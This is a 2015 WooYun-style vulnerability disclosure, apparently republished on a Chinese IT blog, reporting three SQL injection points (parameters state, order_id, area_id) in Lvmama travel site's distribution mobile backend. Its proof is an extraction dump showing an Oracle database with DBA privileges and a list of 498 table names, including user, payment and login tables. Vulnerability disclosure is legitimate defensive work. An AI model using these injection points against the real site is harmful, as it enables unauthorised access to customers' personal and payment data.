IT博客汇 | 驴妈妈旅游网某站多处处SQL注入打包合集

驴妈妈旅游网某站多处处SQL注入打包合集

Chloe O_o发表于 2015-11-09 13:17:52
漏洞标题	驴妈妈旅游网某站多处处SQL注入打包合集
相关厂商	驴妈妈旅游网
漏洞作者	路人甲
提交时间	2015-09-24 16:10
公开时间	2015-11-08 17:44
漏洞类型	SQL注射漏洞
危害等级	高
自评Rank	20
漏洞状态	厂商已经确认
Tags标签
漏洞详情

分销平台移动端后台3处注入打包
http://fenxiao.lvmama.com/m/index.jsp
1.http://fenxiao.lvmama.com/m/order_list.jsp?state=1
注入点state
2.http://fenxiao.lvmama.com/m/order_show.jsp?order_id=4581045
注入点order_id
3.http://fenxiao.lvmama.com/m/2/list0.jsp?area_id=10034&order_cust_id=285818&user_id=123456
注入点area_id
漏洞证明：

库
DBA
498个表
back-end DBMS: Oracle

Database: SAAS15

[498 tables]

+--------------------------------+

| AD_CONTENT                     |

| AD_PAGE                        |

| AD_SEAT                        |

| AD_SEAT_IMG                    |

| AD_SEAT_LINK                   |

| ALITRIP_HOTEL                  |

| ALITRIP_HOTEL_LOG              |

| ALITRIP_HOTEL_ORDER            |

| ALITRIP_HOTEL_ORDER_LOG        |

| ALITRIP_HOTEL_PRODUCT          |

| ALITRIP_HOTEL_PROD_LOG         |

| ALITRIP_HOTEL_PROD_SYNC_LOG    |

| ALITRIP_MENPIAO_LOG            |

| ALITRIP_MENPIAO_NEWLOG         |

| ALITRIP_MENPIAO_ORDER          |

| ALITRIP_MENPIAO_PRODUCT        |

| ALITRIP_MENPIAO_RECEIVE        |

| ALITRIP_ROOMTYPE               |

| B2B_CHANNEL_PRICE              |

| B2B_CHANNEL_PRICE_DAY          |

| B2B_DEALER                     |

| B2B_DEALER_DAY                 |

| B2B_DEALER_LOG                 |

| B2B_FREETRAVEL                 |

| B2B_GRADE_PRICE                |

| B2B_ORDER_REPORT               |

| B2B_PACKAGE                    |

| B2B_SETTLE_METHOD              |

| B2B_SQPRICE                    |

| B2B_SQPRICE_DETAIL             |

| B2B_TICKET                     |

| B2B_TICKET_2012                |

| B2B_TICKET_2013                |

| B2B_TICKET_AIRPORT             |

| B2B_TICKET_BD                  |

| B2B_TICKET_CHANGE              |

| B2B_TICKET_CHANGE_DETAIL       |

| B2B_TICKET_CODE                |

| B2B_TICKET_COND                |

| B2B_TICKET_CONFIRM_LOG         |

| B2B_TICKET_DETAIL              |

| B2B_TICKET_DETAIL_2012         |

| B2B_TICKET_DETAIL_2013         |

| B2B_TICKET_EX                  |

| B2B_TICKET_FINISH_LOG          |

| B2B_TICKET_HIS                 |

| B2B_TICKET_LOG                 |

| B2B_TICKET_PEOPLE              |

| B2B_TICKET_STARTINFO           |

| B2B_TICKET_TRAFFIC             |

| B2C_CHANNEL_PRICE              |

| B2C_TAOBAO_CONFIG              |

| B2C_TAOBAO_LOG                 |

| B2C_TAOBAO_NOTIFYRECEIVEMSG    |

| B2C_TAOBAO_ORDER               |

| B2C_TAOBAO_ORDER_LOG           |

| B2C_TAOBAO_PRODUCT             |

| BANK_CITYCODE                  |

| BILL_TO_UFSOFT                 |

| CM_CHANNEL_PRICE               |

| CM_ORDER_LOG                   |

| CM_PAY_BALANCE                 |

| CM_PAY_DRAWMONEY               |

| CM_PAY_DRAWMONEY_LOG           |

| CM_PAY_MONEY_LOG               |

| CM_PAY_ORDER_LOG               |

| CM_PROD_LOG                    |

| CM_SYNC_LOG                    |

| CM_SYNC_PROD_LOG               |

| CM_USER                        |

| CM_USER_INFO                   |

| CRUEL_CODE_CUST                |

| CRUEL_CODE_LIST                |

| CRUEL_CODE_LOG                 |

| CRUEL_CODE_MESSAGE             |

| CRUEL_CODE_POS                 |

| CRUEL_CODE_VERIFY              |

| CRUEL_EXP_CODE                 |

| CRUEL_EXP_LIST                 |

| CTRIPTICKET_ORDER_LOG          |

| CUSTVIEW_INFO                  |

| CUST_BALANCE_LOG               |

| CUST_INFO_GROUP_CHANNEL        |

| CUST_VIEW_INFO                 |

| DIY_MDD                        |

| DIY_MDD_TYPE                   |

| DIY_REL_MDD_PROD               |

| EXPCODE_DETAIL                 |

| EXPCODE_LIST                   |

| GROUP_INFO                     |

| GROUP_INFO_2ND                 |

| GROUP_INFO_DETAIL_2ND          |

| GROUP_INFO_ORDER               |

| GROUP_ORDER                    |

| GROUP_ORDER_PEOPLE             |

| GROUP_SET                      |

| GROUP_YY_ORDER                 |

| GROUP_YY_ORDER_COND            |

| GROUP_YY_ORDER_DETAIL          |

| GROUP_YY_ORDER_LOG             |

| GROUP_YY_ORDER_PEOPLE          |

| GRP_CHANNEL_PRICE              |

| GRP_GRADE_PRICE                |

| GRP_ORDER                      |

| GRP_ORDER_DETAIL               |

| GRP_TICKET                     |

| GRP_TICKET_PRICE               |

| HOTEL_BRAND                    |

| HOTEL_DISTRICT                 |

| HOTEL_INFO                     |

| HOTEL_WEEKSHOW                 |

| IMP_CODE                       |

| IMP_CODE_DETAIL                |

| IMP_CODE_LIST                  |

| INFO_AIRPORT                   |

| INFO_AIRPORT_FLIGHT            |

| INFO_AIRPORT_NUM               |

| INFO_AIRPORT_NUM_LIST          |

| INFO_AIRPORT_PRICE             |

| INFO_AIRPORT_SEAT              |

| INFO_AREA                      |

| INFO_AREA_EX                   |

| INFO_AUTO_PRICE                |

| INFO_BANK                      |

| INFO_CAR                       |

| INFO_CAR_TYPE                  |

| INFO_CATALOG                   |

| INFO_COMMENT                   |

| INFO_CONDS                     |

| INFO_CTRIPTICKET               |

| INFO_FREETRAVEL                |

| INFO_FREETRAVEL_TREE           |

| INFO_GROUP                     |

| INFO_GROUP_DETAIL              |

| INFO_HOTEL                     |

| INFO_HOTEL_NUM                 |

| INFO_HOTEL_PRICE               |

| INFO_HOTEL_SET                 |

| INFO_INSURANCE                 |

| INFO_INSURANCE_LOG             |

| INFO_INSURANCE_ORDER           |

| INFO_JD                        |

| INFO_MEITUAN                   |

| INFO_NEWS                      |

| INFO_NEWS_READLOG              |

| INFO_PLAN_PRICE                |

| INFO_PROD                      |

| INFO_QUNAR_VIEW                |

| INFO_TB_PRICE                  |

| INFO_TICKET                    |

| INFO_TICKET_CANCEL             |

| INFO_TICKET_COND               |

| INFO_TICKET_CUST               |

| INFO_TICKET_DETAIL             |

| INFO_TICKET_EX                 |

| INFO_TICKET_MAILTEMP           |

| INFO_TICKET_NUM                |

| INFO_TICKET_NUM_FOREX          |

| INFO_TICKET_PRICE              |

| INFO_TICKET_PRICE_FOREX        |

| INFO_TICKET_REL                |

| INFO_TICKET_RELAREA            |

| INFO_TICKET_RELCAT             |

| INFO_TICKET_RELVIEW            |

| INFO_TICKET_REL_CUST           |

| INFO_TOGO                      |

| INFO_TRAFFIC                   |

| INFO_TRAFFIC_NUM               |

| INFO_TRAFFIC_NUM_LIST          |

| INFO_TRAFFIC_PLACE             |

| INFO_TRAFFIC_PRICE             |

| INFO_TRAFFIC_SEAT              |

| INFO_TRAFFIC_STATION           |

| INFO_TRAFFIC_TIMES             |

| INFO_TRAVEL                    |

| INFO_TRAVEL_CYCLE              |

| INFO_TRAVEL_CYCLE_AUTO         |

| INFO_TRAVEL_JOURNEY            |

| INFO_TRAVEL_PRICE              |

| INFO_TRAVEL_SEAT               |

| INFO_VENUE                     |

| INFO_VENUE_NUM                 |

| INFO_VISA                      |

| INFO_VISA_SORT                 |

| INTERFACE_AILVTONG_LOG         |

| INTERFACE_AIZHAOPIAO_LOG       |

| INTERFACE_BEIZHU_LOG           |

| INTERFACE_CAIHUISHIJIE_LOG     |

| INTERFACE_CHANGLU_LOG          |

| INTERFACE_CHANGLV_LOG          |

| INTERFACE_CHANGYOUTONG_LOG     |

| INTERFACE_CTRIP_HOLIDAY        |

| INTERFACE_DADONGRT_LOG         |

| INTERFACE_DDRT_LOG             |

| INTERFACE_DIANPING_LOG         |

| INTERFACE_DMZH_LOG             |

| INTERFACE_DUMUQIAO_LOG         |

| INTERFACE_FURONGYUAN_LOG       |

| INTERFACE_FZG_BIZZONE          |

| INTERFACE_GLYD                 |

| INTERFACE_HKDISNEY_LOG         |

| INTERFACE_HOTEL                |

| INTERFACE_HOTEL_BE_PRODUCT     |

| INTERFACE_HOTEL_DDS_LOG        |

| INTERFACE_HOTEL_DDS_ORDER_LOG  |

| INTERFACE_HOTEL_JL             |

| INTERFACE_HOTEL_JL_LOG         |

| INTERFACE_HOTEL_JL_ORDER_LOG   |

| INTERFACE_HOTEL_LTJL_LOG       |

| INTERFACE_HOTEL_LTJL_ORDER_LOG |

| INTERFACE_HOTEL_LTJL_PRODUCT   |

| INTERFACE_HOTEL_LYY_ORDER_LOG  |

| INTERFACE_HOTEL_PRODUCT        |

| INTERFACE_HOTEL_SYR_LOG        |

| INTERFACE_HOTEL_SYR_ORDER_LOG  |

| INTERFACE_HOTEL_XH_LOG         |

| INTERFACE_HOTEL_XH_ORDER_LOG   |

| INTERFACE_HOTEL_XH_PRODUCT     |

| INTERFACE_HUANQIU_LOG          |

| INTERFACE_HUANTAOYOU_LOG       |

| INTERFACE_HUAXIAPIAOLIAN_LOG   |

| INTERFACE_IHUIU_LOG            |

| INTERFACE_IMAGECO              |

| INTERFACE_IMAGECO_CUST         |

| INTERFACE_JD_CHANNEL_LOG       |

| INTERFACE_JD_COUPON_PWD        |

| INTERFACE_JIDIAOTONG_LOG       |

| INTERFACE_KUIYUAN_LOG          |

| INTERFACE_KUXIU_LOG            |

| INTERFACE_LEXIAOXIANG_LOG      |

| INTERFACE_LINE                 |

| INTERFACE_LINGNAN_LOG          |

| INTERFACE_LIULIUKA_LOG         |

| INTERFACE_LLK_CODE             |

| INTERFACE_LLK_CUST             |

| INTERFACE_LOG                  |

| INTERFACE_LONG                 |

| INTERFACE_LONGHUSHAN_LOG       |

| INTERFACE_MAP                  |

| INTERFACE_MEITUAN_DETAIL       |

| INTERFACE_MEITUAN_LOG          |

| INTERFACE_MJLD_LOG             |

| INTERFACE_MOUNTWG_LOG          |

| INTERFACE_MTS                  |

| INTERFACE_MTS_LOG              |

| INTERFACE_PIAOFUTONG_LOG       |

| INTERFACE_PIAOGJ_LOG           |

| INTERFACE_PIAOGONGCHANG_LOG    |

| INTERFACE_PIAOWUBA_LOG         |

| INTERFACE_PIAOZHIJIA_LOG       |

| INTERFACE_PRICE_RULE           |

| INTERFACE_PROD_SYNC_LOG        |

| INTERFACE_QUNAR                |

| INTERFACE_QUNAR_HISTORY_LOG    |

| INTERFACE_QUNAR_HOLIDAY        |

| INTERFACE_QUNAR_HOLIDAY_LOG    |

| INTERFACE_QUNAR_HOTEL          |

| INTERFACE_QUNAR_HOTEL_LOG      |

| INTERFACE_QUNAR_INVOICE        |

| INTERFACE_QUNAR_LINE_LOG       |

| INTERFACE_QUNAR_LOG            |

| INTERFACE_QUNAR_MOVE           |

| INTERFACE_QUNAR_SUPPLIER_LOG   |

| INTERFACE_SHANHAIGUAN_LOG      |

| INTERFACE_SXLY                 |

| INTERFACE_SYNC_LOG             |

| INTERFACE_TIANGUI_LOG          |

| INTERFACE_TIANKE_LOG           |

| INTERFACE_TICKET               |

| INTERFACE_TONGCHENG_LOG        |

| INTERFACE_TOURMART_LOG         |

| INTERFACE_VISITBEIJING_LOG     |

| INTERFACE_WULONG_LOG           |

| INTERFACE_XIECHENG_LOG         |

| INTERFACE_XINAIMOKE_LOG        |

| INTERFACE_YANGGUANGLZ_LOG      |

| INTERFACE_YINLVTONG_LOG        |

| INTERFACE_YUANFAN_LOG          |

| INTERFACE_YUNDUANDANPIAO_LOG   |

| INTERFACE_YYJQ_LOG             |

| INTERFACE_ZHONGJINGXIN_LOG     |

| JOURNEY                        |

| JOURNEY_COMMENT                |

| JOURNEY_DETAIL                 |

| JOURNEY_PRO_DETAIL             |

| LVWUTONGCODE_QUEUE             |

| LVWUTONG_SMSMODE               |

| LVWUTONG_TMPCODE               |

| LVWUTONG_TMPCODE_GROUP         |

| LVWUTONG_TMPCODE_LOG           |

| LVWUTONG_TMPCODE_USE           |

| ONLINE_DEBUG_LOG               |

| ORDER_ABNORMAL_LOG             |

| ORDER_CHANGE_LOG               |

| ORDER_LOG                      |

| ORDER_RELATION_LOG             |

| PAY_BALANCE                    |

| PAY_CREDIT_FEE                 |

| PAY_DRAWMONEY                  |

| PAY_MOMEY_LOG                  |

| PAY_ORDER_LOG                  |

| PLAN_TABLE                     |

| QUNAR_HOTEL_HISTORYLOG         |

| QUNAR_PRICE_CACHE              |

| RECE_APP                       |

| RECE_APP_DETAIL                |

| RECE_PAYMENT_DETAIL            |

| RECE_PAYMENT_LIST              |

| RECE_STATEMENT_LIST            |

| ROOM_INFO                      |

| RUPD$_B2B_SETTLE_METHOD        |

| RUPD$_B2B_TICKET               |

| RUPD$_B2B_TICKET_DETAIL        |

| RUPD$_HOTEL_BRAND              |

| RUPD$_HOTEL_DISTRICT           |

| RUPD$_HOTEL_INFO               |

| RUPD$_INFO_AREA                |

| RUPD$_INFO_AREA_EX             |

| RUPD$_INFO_BANK                |

| RUPD$_INFO_CAR                 |

| RUPD$_INFO_CONDS               |

| RUPD$_INFO_HOTEL               |

| RUPD$_INFO_NEWS                |

| RUPD$_INFO_PROD                |

| RUPD$_INFO_TICKET              |

| RUPD$_INFO_TICKET_CANCEL       |

| RUPD$_INFO_TICKET_COND         |

| RUPD$_INFO_TICKET_DETAIL       |

| RUPD$_INFO_TICKET_EX           |

| RUPD$_INFO_TICKET_PRICE        |

| RUPD$_INFO_TICKET_RELAREA      |

| RUPD$_INFO_TICKET_RELVIEW      |

| RUPD$_INFO_TRAVEL              |

| RUPD$_INFO_VISA                |

| RUPD$_INFO_VISA_SORT           |

| RUPD$_INTERFACE_LLK_CUST       |

| RUPD$_SAAS_PERMISSION          |

| RUPD$_SAAS_USER_INFO           |

| RUPD$_TB_USR_INFO              |

| RUPD$_TB_VIEW_INFO             |

| RUPD$_USR_TAG                  |

| RUPD$_USR_VIEW                 |

| SAAS_AREA_SUB                  |

| SAAS_BUY_LOG                   |

| SAAS_CLUSTER                   |

| SAAS_DATAMAN                   |

| SAAS_INFO_AREA                 |

| SAAS_INFO_SUB                  |

| SAAS_NEWS                      |

| SAAS_NEWS_SORT                 |

| SAAS_NOTICE                    |

| SAAS_ORDER_SOURCE              |

| SAAS_PAY_DRAWMONEY             |

| SAAS_PAY_DRAWMONEY_LOG         |

| SAAS_PAY_PRODUCT_TYPE          |

| SAAS_PAY_SERVICE               |

| SAAS_PERMISSION                |

| SAAS_TABLE_SQL                 |

| SAAS_USER_INFO                 |

| SAAS_VAP_ORDER                 |

| SAAS_VAP_PRODUCT               |

| SAAS_VIEW_SUB                  |

| SETTLE_ACCOUNT                 |

| SETTLE_PAYABLE                 |

| SETTLE_PAYABLE_DETAIL          |

| SETTLE_PAYABLE_LIST            |

| SETTLE_PAYAPP                  |

| SETTLE_PAYAPP_DETAIL           |

| SETTLE_STATEMENT_DETAIL        |

| SETTLE_STATEMENT_LIST          |

| SITE_IP2                       |

| SMS_CONSUME_LOG                |

| SMS_GETMONEY_LOG               |

| STOCK_ADD_LOG                  |

| STOCK_REPORT_DAY               |

| SYS_CURRENCY_RATE              |

| SYS_FEE_LOG                    |

| SYS_REFER                      |

| SYS_REPORT_DAY                 |

| SYS_SMS_LOG                    |

| SYS_SQL_HISTORY                |

| SYS_SQL_QUEUE                  |

| TB_CONSUME_CODE                |

| TB_RECEIVE_LOG                 |

| TB_USR_INFO                    |

| TB_VIEW_INFO                   |

| TEST_DB                        |

| TOUREASY_AREA                  |

| TOUREASY_LINE                  |

| TOUREASY_ORDER_INFO_PINGZHENG  |

| TOUREASY_ORDER_QUEUE           |

| TOUREASY_PRODUCT               |

| TOUREASY_USR_LOG               |

| TOUR_GUIDE                     |

| TRAFFIC_TO_TICKET              |

| T_EQUIP                        |

| T_EQUIPSUB                     |

| T_LANDMARK                     |

| T_MATERIA                      |

| T_PRO_COMMON_NUM               |

| T_PRO_COMMON_PRICE             |

| T_PRO_DETAIL_COURSE            |

| T_REGIONS                      |

| T_REGIONS_QD                   |

| T_REGIONS_SUBWAY               |

| T_SPORTTYPE                    |

| T_VENUE                        |

| T_VENUE_COUNT                  |

| T_VENUE_PRICE                  |

| T_VENUE_RECORD                 |

| T_VENUE_SUB                    |

| UF_SOFT_QUEUE                  |

| UF_SOFT_SETTLE_PAYABLE         |

| UF_SOFT_USR_CREDIT_LOG         |

| UNIONPAY_CONFIG                |

| UNIONPAY_TRADE_LOG             |

| UPDATE_FOREXPRICE_LOG          |

| USR_ACCOUNT                    |

| USR_ACCOUNT_LOG                |

| USR_ACCOUNT_SET                |

| USR_ATTENTION                  |

| USR_BALANCE_LOG                |

| USR_BOOK                       |

| USR_CHECKIN_TYPE               |

| USR_CREDIT                     |

| USR_CREDIT_LOG                 |

| USR_DEALER                     |

| USR_DEPT                       |

| USR_DIST                       |

| USR_DOCUMENT_TEMP              |

| USR_ENTERPRISE_TAG             |

| USR_GETPASS_LOG                |

| USR_GRADE                      |

| USR_HOTEL_COND                 |

| USR_INFO                       |

| USR_INFO_B2C                   |

| USR_INFO_EXPRESS               |

| USR_INTERFACE                  |

| USR_INTERFACE_INFO             |

| USR_LOG                        |

| USR_LOGIN                      |

| USR_LOGIN_LOG                  |

| USR_LOG_2011                   |

| USR_LOG_2012                   |

| USR_LOG_2013                   |

| USR_MAILTEMP_LIST              |

| USR_MANAGER_USER               |

| USR_MEMBER                     |

| USR_MENU                       |

| USR_MSG                        |

| USR_MSG_COMMENT                |

| USR_MSG_MONEY                  |

| USR_PAGES                      |

| USR_POWER_AREA                 |

| USR_PRINT_TEMP                 |

| USR_PROD_CODE                  |

| USR_PROD_WHILE_AREA            |

| USR_PROD_WHILE_DETAIL          |

| USR_PROD_WHILE_GROUP           |

| USR_PROD_WHILE_LIST            |

| USR_PROD_WHILE_TREE            |

| USR_SCORE                      |

| USR_SCORE_DETAIL               |

| USR_SCORE_LOG                  |

| USR_SCORE_RULE                 |

| USR_TAG                        |

| USR_VIEW                       |

| USR_VIEW_BAK                   |

| USR_VIEW_BOUNTY                |

| USR_VIEW_COLUMN                |

| USR_VIEW_COPY                  |

| USR_VIEW_LINK                  |

| USR_VIEW_MSG                   |

| USR_VIEW_MSG_HIS               |

| USR_VIEW_NAV                   |

| USR_VIEW_PAGE                  |

| USR_VIEW_TEMPLATE              |

| WX_AD                          |

| WX_AD_DETAIL                   |

| WX_AD_SEND_LOG                 |

| WX_KEY                         |

| WX_MSG                         |

| WX_MSG_TEMP                    |

| WX_ORDER_TASK                  |

| WX_SCENE                       |

| WX_SCENE_IN                    |

| WX_SCENE_LOG                   |

| WX_SEND_HISTORY                |

| WX_SEND_QUEUE                  |

| WX_SET                         |

| WX_TREE                        |

| WX_USER_INFO                   |

| XIECHENG_HOTEL_INFO            |

| XIECHENG_HOTEL_LOG             |

| XIECHENG_HOTEL_ORDER           |

| XIECHENG_HOTEL_STATE           |

| INTERFACE_KUIYUAN_LOG          |

| USR_ENTERPRISE_TAG             |

+--------------------------------+
修复方案：

过滤，这个站问题挺多的，厂商好好检查下！
驴妈妈旅游网某站多处处SQL注入打包合集

漏洞详情

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

版权声明：转载请注明来源路人甲@乌云
